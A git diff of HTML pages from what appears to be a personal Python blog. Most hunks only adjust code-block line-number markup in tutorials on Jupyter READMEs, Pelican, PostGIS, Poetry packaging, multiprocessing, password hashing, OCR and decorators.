    --- a/make-a-readme-documentation-with-jupyter-notebooks.html
    +++ b/make-a-readme-documentation-with-jupyter-notebooks.html
    @@ -183,7 +183,7 @@ 

    README.ipynb

    In projects, it's typically best practice not to repeat yourself in multiple places (the DRY principle). In a README, it's nice to have working examples of how a user may use the project. If we could tie the original README to live code that generates the examples, that would be ideal: enter README.ipynb.

    Jupyter supports markdown & code cells, thus all the current documentation in the README.md can be copied into markdown cells. Similarly, the code used to generate examples or demonstrate usage can be placed in code cells. This allows the author to run the entire notebook, generating the new examples & verifying the examples are working code. Fantastic, this is exactly where we want to go.

    Now if you only have the README.ipynb in the repository, GitHub will render the file in its raw form, JSON, which would be hundreds of lines like:
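    For instance, a minimal, abridged sketch of that JSON (the cell contents here are hypothetical):

```python
import json

# The skeleton of a .ipynb file: a JSON document with a list of cells
notebook = {
    "cells": [
        {"cell_type": "markdown", "metadata": {}, "source": ["# My Project\n"]},
        {"cell_type": "code", "execution_count": 1, "metadata": {},
         "outputs": [], "source": ["print('example')\n"]},
    ],
    "metadata": {},
    "nbformat": 4,
    "nbformat_minor": 5,
}
raw = json.dumps(notebook, indent=1)
```

Every markdown heading and every line of code is wrapped in this structure, which is why the raw file is unreadable as a landing page.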

    -
     1
    +
     1
      2
      3
      4
    @@ -242,7 +242,7 @@ 

    README.ipynb -> README.md with n

    Python Highlighting in Output

    When first run, nbconvert wasn't marking the code blocks with the language (python), which is required to highlight the code blocks in the README.md with language specifics. The workaround was to use nbconvert's support for custom templates. See the docs at: https://nbconvert.readthedocs.io/en/latest/customizing.html#Custom-Templates.

    The resulting template "pythoncodeblocks.tpl" was:

    -
    1
    +
    1
     2
     3
     4
    @@ -256,7 +256,7 @@ 

    Python Highlighting in Output

    Which could be used with nbconvert with:

    -
    1
    jupyter nbconvert --template "pythoncodeblocks.tpl" --to markdown README.ipynb
    +
    1
    jupyter nbconvert --template "pythoncodeblocks.tpl" --to markdown README.ipynb
     

    Integration into Documentation with Sphinx

    @@ -279,7 +279,7 @@

    Integration into Documentati

    Autosummary-generated documentation is included within a separate rst file (developer.rst), to nest everything generated with autosummary under one heading in the ReadTheDocs theme

    index.rst

    -
     1
    +
     1
      2
      3
      4
    @@ -355,7 +355,7 @@ 

    Integration into Documentati

    developer.rst

    -
     1
    +
     1
      2
      3
      4
    diff --git a/making-executable-guis-with-python-gooey-pyinstaller.html b/making-executable-guis-with-python-gooey-pyinstaller.html
    index 06894850..b77a913c 100644
    --- a/making-executable-guis-with-python-gooey-pyinstaller.html
    +++ b/making-executable-guis-with-python-gooey-pyinstaller.html
    @@ -159,7 +159,7 @@ 

    Making Executable

    Today we will go through how to go from a Python script to a packaged executable with a graphical user interface (GUI) for users. First off, we start by writing the scripts that we would like others to be able to use, especially users who may be uncomfortable in a programming environment and would feel at home with a GUI.

    My personal favourite part about Gooey, is that you are essentially creating a command line interface (CLI) tool, which Gooey then uses to generate a GUI. This eliminates having two separate code bases to facilitate CLI & GUI users, which can be very painful at times.

    -
     1
    +
     1
      2
      3
      4
    @@ -216,7 +216,7 @@ 

    Making Executable

    The 2 functions defined above are for getting information about selected files, or returning a list of files found within a folder (and its subfolders).

    Now to use Gooey, we need to define a 'main' function for parsing the arguments from which the GUI generates its controls. As Gooey is based on the argparse library, if you have previously built CLI tools with argparse, the migration to Gooey is quite simple. However, as there are always edge cases, ensure you check your tool's functionality once you have developed it.

    -
     1
    +
     1
      2
      3
      4
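    The argparse core that Gooey wraps can be sketched like this; in the real script, the function building the parser would carry an @Gooey(...) decorator to generate the GUI, and the command and argument names here are hypothetical:

```python
import argparse

def build_parser():
    parser = argparse.ArgumentParser(description="File tools")
    subparsers = parser.add_subparsers(dest="command")

    # One subparser per script the GUI exposes
    info = subparsers.add_parser("file_info", help="Show info for selected files")
    info.add_argument("paths", nargs="+", help="Files to inspect")

    listing = subparsers.add_parser("list_folder", help="List files in a folder")
    listing.add_argument("folder", help="Folder to walk (including subfolders)")
    return parser

args = build_parser().parse_args(["file_info", "a.txt", "b.txt"])
```

Because the parser is plain argparse, the same script stays usable from the command line; Gooey only changes how the arguments are collected.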
    @@ -264,7 +264,7 @@ 

    Making Executable

    By using the Gooey decorator we are able to define many different layout options for our GUI. Since we are trying to enable users to use multiple scripts which are different and separate, I personally like to use the optional columns layout, but there are many other layouts which can be seen here: https://github.com/chriskiehl/Gooey#layout-customization.

    Following this we create our argument parsing function, in which we define parsers and subparsers and add the arguments. This post will not cover how to write CLIs, but it is on the list for future posts.

    To complete the script, we need to put in the functionality at startup.

    -
    1
    +
    1
     2
     3
     4
    @@ -287,7 +287,7 @@ 

    Making Executable

    This will then generate a build folder and a dist folder within your current directory. The build folder will contain all the files used in generating the executable, which is found within the dist folder.

    image-20191102174758361

    The code in its entirety is:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/migrating-from-wordpress-to-pelican.html b/migrating-from-wordpress-to-pelican.html
    index 2788499c..842c19e6 100644
    --- a/migrating-from-wordpress-to-pelican.html
    +++ b/migrating-from-wordpress-to-pelican.html
    @@ -184,12 +184,12 @@ 

    Themes

    http://www.pelicanthemes.com/

    This lets you scroll through the various themes, and even links to each theme's repository on GitHub if you wish to use it. The theme I decided on was Flex by Alexandre Vicenzi.

    Applying the theme was as simple as cloning the repo (or using git submodules) and adding one line of code in pelicanconf.py (generated automatically by pelican-quickstart).

    -
    1
    THEME = "./themes/Flex"
    +
    1
    THEME = "./themes/Flex"
     

    Plugins

    Admittedly, I just tried out all the plugins in the Pelican Plugins Repository until I found the combination that works for me, this ended up being:

    -
     1
    +
     1
      2
      3
      4
    @@ -237,7 +237,7 @@ 

    Wordpress Import

    Now that I had the skeleton of the website set up, I needed to bring in all the existing posts from WordPress. By following another guide within the Pelican documentation (http://docs.getpelican.com/en/3.6.3/importer.html), this was a relatively simple task. However, I did spend the time to go through each markdown file and manually remove redundant 'wordpress' formatting tags.

    Linking to Content

    As one of the main tasks of this project was to consolidate articles with their content/code/analysis in one spot, I initially followed the guide at http://docs.getpelican.com/en/3.6.3/content.html during development.

    -
    1
    +
    1
     2
     3
     4
    @@ -257,7 +257,7 @@ 

    Linking to Content

    I ended up with a structure like the above, which annoyed me a bit: the content was now in one place, but still divided into 3 folders with little-to-no link between them. My goal was to have a structure like:

    -
     1
    +
     1
      2
      3
      4
    @@ -285,7 +285,7 @@ 

    Travis CI

    To be honest, I was actually surprised at how easy it was to set up Travis CI, and that I could spin up a virtual machine, install all the dependencies and re-build the website. However, I had a lot of trouble trying to get Travis CI to push back to the repository such that Netlify could build from it.

    This was later remedied by setting a repository secret variable on Travis CI, as I couldn't get the secret token encrypted by the Travis CI CLI (a Ruby application).

    In essence, all that was needed was a .travis.yml file in the root directory which ended up like this:

    -
     1
    +
     1
      2
      3
      4
    diff --git a/ml-agents-for-unity-on-apple-silicon-m1m2m3.html b/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    index 160999f5..233aa2bb 100644
    --- a/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    +++ b/ml-agents-for-unity-on-apple-silicon-m1m2m3.html
    @@ -166,21 +166,21 @@ 

    Miniconda

    Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:

    https://docs.conda.io/en/latest/miniconda.html

    Following this, the conda-forge is added as a channel (instructions from https://conda-forge.org/docs/user/introduction.html):

    -
    1
    +
    1
     2
    conda config --add channels conda-forge
     conda config --set channel_priority strict
     

    Conda environment

    Big thank you to this github thread (and user @automata) for finally leading me down a successful path https://github.com/Unity-Technologies/ml-agents/issues/5797:

    -
    1
    conda create -n mlagents python==3.10.7
    +
    1
    conda create -n mlagents python==3.10.7
     

    Ensure you download the specific release you are targeting; releases are managed by branches on the repo, i.e. https://github.com/Unity-Technologies/ml-agents/tree/latest_release. If you are using the gh CLI: gh repo clone Unity-Technologies/ml-agents -- --branch release_20

    Next we need to edit setup.py found in ml-agents-release_20/ml-agents/setup.py, specifically line 71 to:

    -
    1
    "torch>=1.8.0,<=1.12.0;(platform_system!='Windows' and python_version>='3.9')"
    +
    1
    "torch>=1.8.0,<=1.12.0;(platform_system!='Windows' and python_version>='3.9')"
     

    Now we install the ml-agents package (which has a dependency on torch) through the locally edited version:

    @@ -188,7 +188,7 @@

    Conda environment

    Theoretically, this is where we should've been done and been able to run mlagents-learn without any more problems, but that wasn't the case. The next error we run into is:

    TypeError: Descriptors cannot not be created directly.

    Which was resolved through https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly

    -
    1
    pip install protobuf~=3.20
    +
    1
    pip install protobuf~=3.20
     
    @@ -200,7 +200,7 @@

    Conda environment

    ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'

    Which was resolved through https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app

    -
    1
    +
    1
     2
    pip uninstall grpcio -y
     conda install grpcio -y
     
    @@ -210,7 +210,7 @@

    Conda environment

    Finally we can run:

    mlagents-learn

    To be met with this glorious screen

    -
     1
    +
     1
      2
      3
      4
    diff --git a/optimization-gotchas-in-postgis-for-geospatial-queries.html b/optimization-gotchas-in-postgis-for-geospatial-queries.html
    index 638ba072..01d4b559 100644
    --- a/optimization-gotchas-in-postgis-for-geospatial-queries.html
    +++ b/optimization-gotchas-in-postgis-for-geospatial-queries.html
    @@ -168,7 +168,7 @@ 

    Load

    ogr2ogr -f "PostgreSQL" PG:"dbname=postgres user=postgres password=root host=localhost" "water_polygons.shp" -progress -overwrite -nlt PROMOTE_TO_MULTI -nln water

    Generate points

    Now that we have our polygons loaded into a table, we need to generate points to be evaluated:

    -
    1
    +
    1
     2
     3
     4
    @@ -183,7 +183,7 @@ 

    Generate points

    Baseline test

    Our baseline test is a point-in-polygon spatial join: count how many points are within each polygon. This demonstrates the effectiveness of indexing, point-in-polygon calculations and general overhead. By using the EXPLAIN ANALYZE operator in PostgreSQL, we can look into how the database plans and executes the query, along with how long the query took. We'll also take only 50% of the points, as querying the entire table defeats the purpose of this task.

    -
    1
    +
    1
     2
     3
     4
    @@ -197,7 +197,7 @@ 

    Baseline test

    By running without any of the following optimizations, we get the result of:

    -
     1
    +
     1
      2
      3
      4
    @@ -233,7 +233,7 @@ 

    Baseline test

    Optimize Techniques

    Set the page size

    Kudos to Paul Ramsey (source) for demonstrating the effectiveness of setting the page size for PostgreSQL (and by extension PostGIS). By default, PostgreSQL limits itself to a set amount of internal memory for processing queries, which does not leverage the computing power available on our machines. By allowing PostgreSQL to use more of the available memory, we should see query performance improve.

    -
    1
    +
    1
     2
     3
     4
    @@ -247,7 +247,7 @@ 

    Set the page size

    By running the baseline test again:

    -
     1
    +
     1
      2
      3
      4
    @@ -289,11 +289,11 @@ 

    Set the page size

    Create a spatial index

    One technique that should always be used in databases is indexing, especially for geospatial databases. Creating an index on our database is as simple as:

    -
    1
    CREATE INDEX geometry_index ON water USING GIST(wkb_geometry);
    +
    1
    CREATE INDEX geometry_index ON water USING GIST(wkb_geometry);
     

    This works by computing the bounding box of each geometry in the dataset; whenever a query comes in that evaluates against the geometries (e.g. intersection), the query planner first reduces the candidates to geometries whose bounding box passes the test, before evaluating against the entire geometry.

    -
     1
    +
     1
      2
      3
      4
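    The bounding-box pre-filter idea behind a GiST index can be sketched in a few lines; this is a toy illustration of the concept, not how PostGIS implements it:

```python
# A cheap rectangle test rejects most geometries before any exact
# point-in-polygon check has to run.
def bounding_box(points):
    xs = [x for x, _ in points]
    ys = [y for _, y in points]
    return min(xs), min(ys), max(xs), max(ys)

def bbox_contains(box, point):
    min_x, min_y, max_x, max_y = box
    return min_x <= point[0] <= max_x and min_y <= point[1] <= max_y

polygon = [(0, 0), (4, 0), (4, 4), (0, 4)]
box = bounding_box(polygon)
candidate = bbox_contains(box, (2, 2))   # passes; exact check still needed
rejected = bbox_contains(box, (10, 10))  # rejected without touching the geometry
```

Since the rectangle test is a handful of comparisons while an exact check against a coastline polygon can touch thousands of vertices, filtering on the index first is an enormous saving.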
    diff --git a/packaging-python-packages-with-poetry.html b/packaging-python-packages-with-poetry.html
    index 998c62c5..904729d5 100644
    --- a/packaging-python-packages-with-poetry.html
    +++ b/packaging-python-packages-with-poetry.html
    @@ -192,7 +192,7 @@ 

    What is Poetry

    Package Structure

    Python packages require a standard structure (albeit lenient), which Poetry sets up for you when a project is initialized. If we run poetry new test_package we will end up with the structure:

    -
    1
    +
    1
     2
     3
     4
    @@ -239,7 +239,7 @@ 

    Package Structure

    __init__.py Files

    What are all these __init__.py files and what are they there for? To be able to import code from another folder, Python requires an __init__.py inside that folder to mark it as a package.

    If we create a function inside our test_package folder:

    -
    1
    +
    1
     2
     3
    +-- test_package
     |   +-- __init__.py
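    To see why the __init__.py matters, here is a throwaway sketch that builds a package on disk and imports from it; the add function is hypothetical, not part of the post's package:

```python
import os
import sys
import tempfile

# Build a minimal test_package on disk: an __init__.py that re-exports
# a function from a module alongside it.
root = tempfile.mkdtemp()
pkg = os.path.join(root, "test_package")
os.makedirs(pkg)
with open(os.path.join(pkg, "__init__.py"), "w") as handle:
    handle.write("from .maths import add\n")
with open(os.path.join(pkg, "maths.py"), "w") as handle:
    handle.write("def add(a, b):\n    return a + b\n")

sys.path.insert(0, root)
import test_package

result = test_package.add(2, 3)
```

Without the __init__.py, the import fails; with it, the folder is a package, and the re-export in __init__.py decides what users see at the top level.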
    @@ -254,13 +254,13 @@ 

    Wordsum - My First Package

    If you have read this blog previously, I did a post on answering the question "How many words have I written in this blog?" which you can reach at: https://jackmckew.dev/counting-words-with-python.html.

    This was great: I had written 2 functions which count how many words are inside markdown files & Jupyter notebooks. Following this, I had an idea: why not make a 'ticker' of how many words have been written in this blog and display it on the website, making sure that whenever a new post is added, the 'word ticker' increments by the number of words in that post.

    This is the inspiration behind Wordsum, which is also available on PyPI. Meaning you can install it with:

    -
    1
    pip install wordsum
    +
    1
    pip install wordsum
     

    Wordsum Package Structure

    To make the two functions more extensible, they were further broken into smaller functions contained in their own 'internal' packages (folders).

    The basic structure we ended up with was:

    -
     1
    +
     1
      2
      3
      4
    @@ -291,7 +291,7 @@ 

    Wordsum Package Structure

    The main functions of the package are kept within word_sum.py (which uses the functions in the _xxx folders).

    User Interaction

    To make the main functions within word_sum.py accessible to users of the package we can import them in the 'top' __init__.py of the wordsum package.

    -
    1
    +
    1
     2
     3
     4
    @@ -303,7 +303,7 @@ 

    User Interaction

    This will allow users to interact with the package like:

    -
    1
    +
    1
     2
     3
     4
    @@ -316,7 +316,7 @@ 

    User Interaction

    Publishing to PyPI

    Since we've used Poetry with the development of this package, our pyproject.toml should be a bit more fleshed out. Wordsum's pyproject.toml ended up as:

    -
     1
    +
     1
      2
      3
      4
    @@ -368,12 +368,12 @@ 

    Publishing to PyPI

    All that is left to do is to sign up for an account on PyPI and run:

    -
    1
    poetry publish
    +
    1
    poetry publish
     

    This will ask for your PyPI credentials, build the package (a step done by setuptools previously) and upload the package for you.

    Now users can install your package with:

    -
    1
    pip install wordsum
    +
    1
    pip install wordsum
     

    Integrating Wordsum Into This Website

    @@ -382,7 +382,7 @@

    Integrating Wordsum Into This Web

    So there were only 3 files that I needed to edit: pelicanconf.py, requirements.txt and an html file for the theme. pelicanconf.py contains all the instructions provided to pelican when building the site, requirements.txt contains the list of packages for Travis CI to use, and the template html file defines how it is represented on the web.

    Update requirements.txt

    First off we add wordsum to the virtual environment for the project and freeze the environment into requirements.txt with

    -
    1
    +
    1
     2
    pip install wordsum
     pip freeze > requirements.txt
     
    @@ -392,7 +392,7 @@

    Update requirements.txt

    Update pelicanconf.py

    This file contains the code that runs when pelican content is called to build this website. To interface with wordsum we add the code:

    -
    1
    +
    1
     2
     3
     4
    import wordsum
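    The heart of what the word ticker computes can be sketched without wordsum installed; count_words here is a hypothetical stand-in for wordsum's API, counting words across all markdown files under a content folder:

```python
import tempfile
from pathlib import Path

def count_words(content_dir):
    """Total the words across every markdown file under content_dir."""
    total = 0
    for md_file in Path(content_dir).rglob("*.md"):
        total += len(md_file.read_text(encoding="utf-8").split())
    return total

# Demonstrate on a throwaway content folder with one tiny post
content = tempfile.mkdtemp()
Path(content, "post.md").write_text("hello world from pelican", encoding="utf-8")
word_ticker = count_words(content)
```

In pelicanconf.py the result of a call like this is assigned to a setting, which the theme template then renders.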
    @@ -407,7 +407,7 @@ 

    Update pelicanconf.py

    Update base.html

    Now we just need to show our word ticker on the website. In the Flex theme, all pages inherit from a base.html file. To squeeze our new metrics onto the page we add the lines:

    -
    1
    +
    1
     2
     3
     4
    {% if WORD_TICKER %}
    diff --git a/parallel-processing-in-python.html b/parallel-processing-in-python.html
    index 236cb581..4f12c9e4 100644
    --- a/parallel-processing-in-python.html
    +++ b/parallel-processing-in-python.html
    @@ -160,7 +160,7 @@ 

    Parallel Processing in Python

    Parallel processing is a mode of operation where a task is executed simultaneously on multiple processors in the same computer. The purpose is to reduce overall processing time; however, there is often overhead communicating between processes, and for small tasks this overhead can outweigh the benefit, increasing the overall time taken.

    For this post we will be using the multiprocessing package in Python. Multiprocessing is a part of the standard library and supports spawning processes using an API similar to the threading module (also a part of the standard library). The main benefit of the multiprocessing package is that it side-steps the global interpreter lock (GIL) by using subprocesses instead of threads.

    The number of processors or threads in your computer dictates the maximum number of processes you can run at a time. To add flexibility to your program when it may be run across multiple machines, it is good practice to make use of the cpu_count() function, a part of the multiprocessing package, as shown below (please note f-strings were only introduced in Python 3.6).

    -
    1
    +
    1
     2
    import multiprocessing as mp
     print(f"Maximum number of processes: {mp.cpu_count()}")
     
    @@ -176,7 +176,7 @@

    The Pool Class

  • Pool.map_async
    Before we tackle the asynchronous variants of the pool methods (the async suffix), here is a simple example using Pool.apply and Pool.map. We initialize the number of processes to the maximum available on the system.

    -
    1
    +
    1
     2
     3
     4
    @@ -190,7 +190,7 @@ 

    The Pool Class

    With the results being [1, 2, 9, 64], i.e. 1^0, 2^1, 3^2, 4^3. This can also be achieved similarly with Pool.map.

    -
    1
    +
    1
     2
     3
     4
    @@ -204,7 +204,7 @@ 

    The Pool Class

    Both of these will block the main program that calls them until all processes in the pool are finished; use them if you want to obtain results in a particular order. However, if you don't care about the order and want to retrieve results as soon as they finish, then use the async variants.

    -
    1
    +
    1
     2
     3
     4
    @@ -221,7 +221,7 @@ 

    The Pool Class

    The Process Class

    The Process class is the most basic approach to parallel processing in the multiprocessing package. Here we will use a simple queue to generate 10 random numbers in parallel.
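
    Since the hunk hides the code body, here is a minimal sketch of that Process-plus-Queue pattern (function name is my own, not necessarily the post's):

    ```python
    import multiprocessing as mp
    import random

    def rand_num(queue):
        # each process puts one random number onto the shared queue
        queue.put(random.random())

    if __name__ == "__main__":
        queue = mp.Queue()
        processes = [mp.Process(target=rand_num, args=(queue,)) for _ in range(10)]
        for p in processes:
            p.start()
        for p in processes:
            p.join()
        results = [queue.get() for _ in range(10)]
        print(results)  # 10 random floats in [0, 1)
    ```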

    -
     1
    +
     1
      2
      3
      4
    diff --git a/portfolio-balancing-with-historical-stock-data.html b/portfolio-balancing-with-historical-stock-data.html
    index 6a19c79e..9ff29199 100644
    --- a/portfolio-balancing-with-historical-stock-data.html
    +++ b/portfolio-balancing-with-historical-stock-data.html
    @@ -173,7 +173,7 @@ 

    Portfolio Balancing with
  • Pick the desired solution.
  • To generate random portfolios, we define a function that accepts varying parameters, so we can tweak the outcomes later.
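
    A minimal sketch of such a function (the name and signature here are assumptions, not the post's exact code): each portfolio is a vector of non-negative weights normalised to sum to 1.

    ```python
    import numpy as np

    def random_portfolios(num_portfolios, num_assets, seed=None):
        # each row is one portfolio: non-negative weights summing to 1
        rng = np.random.default_rng(seed)
        weights = rng.random((num_portfolios, num_assets))
        return weights / weights.sum(axis=1, keepdims=True)

    weights = random_portfolios(num_portfolios=5, num_assets=4, seed=42)
    print(weights.sum(axis=1))  # each row sums to 1.0
    ```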

    -
     1
    +
     1
      2
      3
      4
    @@ -211,7 +211,7 @@ 

    Portfolio Balancing with

    Assessing the riskiness of a portfolio with Python

    Bernard Brenyah, whom I mentioned at the beginning of the post, has provided a clear explanation of how the above formula can be expressed as a matrix calculation in one of his blog posts. We simply take that matrix calculation and multiply by 253, the number of trading days in Australia.
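
    In code, that matrix calculation looks roughly like the following sketch (function name and the two-asset covariance values are illustrative; 253 trading days assumed as above):

    ```python
    import numpy as np

    def portfolio_volatility(weights, daily_cov, trading_days=253):
        # annualised volatility: sqrt(w^T . Sigma . w * trading_days)
        return np.sqrt(weights @ daily_cov @ weights * trading_days)

    # illustrative two-asset covariance matrix of daily returns
    cov = np.array([[0.0001, 0.00002],
                    [0.00002, 0.0002]])
    vol = portfolio_volatility(np.array([0.5, 0.5]), cov)
    print(vol)
    ```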

    -
    1
    +
    1
     2
     3
     4
    @@ -223,7 +223,7 @@ 

    Portfolio Balancing with

    Now that we have X randomly generated portfolios, all ranked against one another, it's time to plot the results so they can be visualized.

    -
     1
    +
     1
      2
      3
      4
    @@ -297,7 +297,7 @@ 

    Portfolio Balancing with

    The function 'display_random_efficient_frontier' above determines the maximum Sharpe ratio portfolio and the minimum volatility portfolio among those generated, along with their respective returns. It is then entirely up to the trader how much risk they are willing to take on with their portfolio. The settings below, in conjunction with the previously defined functions and stock data, generate the portfolios (the risk-free rate was determined from this website).

    -
    1
    +
    1
     2
     3
     4
    diff --git a/python-and-data-security-hashing-algorithms.html b/python-and-data-security-hashing-algorithms.html
    index 589a426f..bd3aaab1 100644
    --- a/python-and-data-security-hashing-algorithms.html
    +++ b/python-and-data-security-hashing-algorithms.html
    @@ -224,11 +224,11 @@ 

    Using hashes with Python

    From this, we will use the argon2 hashing algorithm. As usual, it is best practice to set up a virtual environment (or conda environment) and install the dependencies, in this case passlib.

    First of all, import the hashing algorithm you wish to use from the passlib package:

    -
    1
    from passlib.hash import argon2
    +
    1
    from passlib.hash import argon2
     

    After importing the hashing algorithm, hashing the password in our case is very simple, and we can have a peek at what the output hash looks like:

    -
    1
    +
    1
     2
     3
    hash = argon2.hash("super_secret_password")
     
    @@ -247,7 +247,7 @@ 

    Using hashes with Python

  • $mvLTquN71JPjuC+S9QNXYA - the base64-encoded hashed password (derived key), using standard base64 encoding and no padding.
  • If we run this again, we can check that the outputs are completely different due to the randomly generated salt.

    -
    1
    +
    1
     2
     3
    hash = argon2.hash("super_secret_password")
     
    @@ -259,14 +259,14 @@ 

    Using hashes with Python

    Now that we've generated our new passwords, stored them in a secure database somewhere, and used a secure method of communication somehow, our user wants to log in with the password they signed up with ("super_secret_password"), and we have to check whether this is the correct password.

    To do this with passlib, it is as simple as calling the .verify function with the plaintext and the equivalent hash, which returns a boolean indicating whether or not the password is correct.

    -
    1
    print(argon2.verify("super_secret_password",hash))
    +
    1
    print(argon2.verify("super_secret_password",hash))
     

    True

    Hooray! Our password verification system works. Now we would like to check that, if the user inputs an incorrect password, our algorithm correctly returns False.

    -
    1
    print(argon2.verify("user_name",hash))
    +
    1
    print(argon2.verify("user_name",hash))
     
    diff --git a/python-and-ocr.html b/python-and-ocr.html index 30673cf6..16403eef 100644 --- a/python-and-ocr.html +++ b/python-and-ocr.html @@ -163,7 +163,7 @@

    Python and OCR

    Now we are finally ready to test the engine and see if we can extract text out of an image. First of all, we will start with a 'well' written example: the 'logo' of this website!

    test_image

    Of course, we have yet to write any code, so naturally, that is the next step. As always in a Python project, you will need to import all the dependencies of the project; in this case, Image from the PIL (pillow) package, and pytesseract (the Python wrapper around the Tesseract engine).

    -
    1
    +
    1
     2
    from PIL import Image
     import pytesseract
     
    @@ -174,7 +174,7 @@

    Python and OCR

  • PyTesseract.
  • Luckily for us, the developers have made this so simple it could be a one-liner:

    -
    1
    print(pytesseract.image_to_string(Image.open('images/example.png')))
    +
    1
    print(pytesseract.image_to_string(Image.open('images/example.png')))
     

    Which outputs in the console from the example image above:

    @@ -186,7 +186,7 @@

    Python and OCR

    Great! We can confirm that the text the Tesseract engine detected is, in fact, exactly the text in the example we gave it.

    However, let's go a little out of our way to make this a function, so it can be called more easily with the file path to the image as a string.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/python-decorators-explained.html b/python-decorators-explained.html
    index 880995ec..048571f9 100644
    --- a/python-decorators-explained.html
    +++ b/python-decorators-explained.html
    @@ -159,7 +159,7 @@ 

    Python Decorators Explained

    Python decorators are one of the most difficult concepts in Python to grasp, and consequently a lot of beginners struggle with them. However, they help shorten code and make it more 'Pythonic'. This post is going to go through some basic examples where decorators can shorten your code.

    Firstly, you have to understand functions within Python:

    -
     1
    +
     1
      2
      3
      4
    @@ -198,7 +198,7 @@ 

    Python Decorators Explained

    As we can see above, we can give functions default arguments (the string 'Jack' for the name variable in hello), assign functions to variables (ensuring the parentheses are not included, otherwise we would be assigning the function's return value), and delete the previous function now that we have 'copied' it over.

    Now to take the next step into functions within Python: defining functions within functions.

    -
     1
    +
     1
      2
      3
      4
    @@ -234,7 +234,7 @@ 

    Python Decorators Explained

    Now that we can make nested functions (functions within functions), the next step is functions returning functions.

    -
     1
    +
     1
      2
      3
      4
    @@ -272,7 +272,7 @@ 

    Python Decorators Explained

    From earlier, we know that if we don't include the parentheses then the function is not executed. An extension of this format is that we can now call hello()(), which outputs "Now you are in the greeting() function".
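
    Since the code is elided in this hunk, a minimal sketch of that pattern (this version returns the string rather than printing it, so the behaviour is visible):

    ```python
    def hello():
        def greeting():
            return "Now you are in the greeting() function"
        # no parentheses: return the inner function itself, not its result
        return greeting

    print(hello()())  # Now you are in the greeting() function
    ```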

    -
     1
    +
     1
      2
      3
      4
    @@ -294,7 +294,7 @@ 

    Python Decorators Explained

    Now you have all the knowledge to learn what decorators really are: they let you execute code before and after a function. The code above is actually a decorator, but let's make it more usable.

    -
     1
    +
     1
      2
      3
      4
    @@ -336,7 +336,7 @@ 

    Python Decorators Explained

    Now you've made a decorator! We've just used what we learned previously to modify a function's behaviour in one way or another. To make it even more concise, we can use the @ symbol. Here is how we could have written the previous code with the @ symbol.
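
    A minimal sketch of the @ syntax (names are illustrative, not the post's originals; the log list just makes the before/after ordering observable):

    ```python
    log = []

    def my_decorator(func):
        # wrap func so code runs before and after it
        def wrapper():
            log.append("before")
            func()
            log.append("after")
        return wrapper

    @my_decorator  # equivalent to: hello = my_decorator(hello)
    def hello():
        log.append("hello")

    hello()
    print(log)  # ['before', 'hello', 'after']
    ```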

    -
     1
    +
     1
      2
      3
      4
    diff --git a/python-for-the-finance-industry.html b/python-for-the-finance-industry.html
    index 86e628af..7ac81520 100644
    --- a/python-for-the-finance-industry.html
    +++ b/python-for-the-finance-industry.html
    @@ -176,7 +176,7 @@ 

    Python for the Finance Industry

    To import these libraries into our Python code, the following code is required:

    -
    1
    +
    1
     2
     3
     4
    import pandas as pd
    @@ -189,7 +189,7 @@ 

    Python for the Finance Industry

    process and display the data. The first step is to extract the data in a useful format from the Alpha Vantage API.

    First, declare a list of all the companies' ASX codes with the suffix ".AX" to denote that they're from the ASX. After that, initialise an empty pandas dataframe to be filled with the data to analyse. Now iterate over the list, calling a request through the API for the data that is required. There are multiple formats of data that can be extracted through the API, as detailed in the Alpha Vantage documentation. For this post, I have used the get_daily function from the timeseries object in alpha_vantage to extract the daily information on each stock for the past 20 years, in particular the closing value.

    -
     1
    +
     1
      2
      3
      4
    @@ -212,7 +212,7 @@ 

    Python for the Finance Industry

    stocks_listing

    Now that the dataframe is full of closing values for each company's stock, it's time to begin processing. First of all, for any missing data or erroneous 0 values, the ffill() function is used to fill each missing value by propagating the last valid observation forward. After that, the timestamp on each row is converted to a datetime type and set as the index of the dataframe.

    -
    1
    +
    1
     2
     3
stocks_df = stocks_df.replace(0, float("nan")).ffill()  # pd.np.nan is removed in modern pandas
     stocks_df.index = pd.to_datetime(stocks_df["date"])
    @@ -220,7 +220,7 @@ 

    Python for the Finance Industry

    Now that the data has gone through its pre-processing phase, it's time to begin plotting some figures. To begin, a basic figure: plotting a single line for each company's stock price over the past 20 years on one graph, to enable comparison between the companies.

    -
    1
    +
    1
     2
     3
     4
    @@ -235,7 +235,7 @@ 

    Python for the Finance Industry

    line_graph Another way to plot this data is to show it as the percentage change from the day before, also known as daily returns. By plotting the data this way, instead of showing the actual prices, the graph shows the stocks' volatility.
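
    The percentage-change computation can be sketched with pandas as follows (ticker names and prices here are illustrative, not the post's data):

    ```python
    import pandas as pd

    # illustrative closing prices for two stocks
    prices = pd.DataFrame({"CBA.AX": [100.0, 102.0, 101.0],
                           "BHP.AX": [50.0, 50.5, 51.0]})
    # pct_change gives the fractional change from the previous row (daily returns)
    daily_returns = prices.pct_change()
    print(daily_returns)
    ```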

    -
    1
    +
    1
     2
     3
     4
    diff --git a/python-project-workflow.html b/python-project-workflow.html
    index f1bc3637..4605a6cf 100644
    --- a/python-project-workflow.html
    +++ b/python-project-workflow.html
    @@ -162,7 +162,7 @@ 

    Python Project Workflow

    Now once these are installed (if you put them in the default location), Python will be located in: C:\Users\Jack\AppData\Local\Programs\Python\Python37-32. For the next few steps, to ensure we are setting up virtual environments for our projects, open a command prompt here if you are on Windows. This will look something like this:

    image-11.png

    The 'cd' command on Windows (and other OSes) stands for change directory; follow it with a path and you will be brought to that directory. Next, whenever I first install Python I like to update pip to its latest release; to do this, use this command in that window:

    -
    1
    python -m pip install --upgrade pip
    +
    1
    python -m pip install --upgrade pip
     

    With pip upgraded to its current release, it's time to install some very helpful packages for setting up projects: virtualenv and cookiecutter. To install these, navigate to the Scripts folder within the current directory with cd ('cd Scripts') and run 'pip.exe install virtualenv cookiecutter'; pip will then work its magic and install these packages for you.

    @@ -178,24 +178,24 @@

    Python Project Workflow

    If you chose to do this step, you will now be able to create virtual environments and cookiecutter templates without having to specify the directory to the executables.

